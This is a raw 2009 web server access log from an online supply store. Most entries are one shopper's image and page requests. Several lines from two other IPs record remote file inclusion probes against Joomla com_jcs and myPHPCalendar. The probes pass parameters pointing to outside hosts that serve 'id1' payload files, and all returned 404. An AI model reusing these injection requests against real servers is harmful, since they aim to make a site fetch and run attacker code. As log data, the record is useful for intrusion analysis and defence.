68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG HTTP/1.1" 200 72425 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/addtocart.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0031070_THUMB.JPG HTTP/1.1" 200 811 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0032264_THUMB.JPG HTTP/1.1" 200 1746 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0032276_THUMB.JPG HTTP/1.1" 200 1704 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/6471097_THUMB.JPG HTTP/1.1" 200 1351 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0032261_THUMB.JPG HTTP/1.1" 200 1516 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0032165_THUMB.JPG HTTP/1.1" 200 2011 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0032270_THUMB.JPG HTTP/1.1" 200 1646 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/items/0031208_THUMB.JPG HTTP/1.1" 200 1322 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:17 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
110.45.147.248 - - [22/Oct/2009:00:18:36 -0400] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:18:41 -0400] "GET /logs/access_log.Q109082500//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:18:56 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:19:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:05 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:18 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [22/Oct/2009:00:19:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.147.248 - - [22/Oct/2009:00:19:23 -0400] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:19:23 -0400] "GET /logs/access_log.Q109082500//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:19:29 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:19:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:31 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG HTTP/1.1" 200 77718 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C42837931009749076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:19:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.118.81 - - [22/Oct/2009:00:20:01 -0400] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:20:01 -0400] "GET /myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:20:01 -0400] "GET /logs/access_log.Q109090800%20%20/myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:20:10 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.118.81 - - [22/Oct/2009:00:20:13 -0400] "GET /logs/access_log.Q109091500%20%20/myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:20:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG HTTP/1.1" 200 55094 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/addtocart.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/items/688275_THUMB.JPG HTTP/1.1" 200 2821 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/items/9600030_THUMB.JPG HTTP/1.1" 200 2861 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
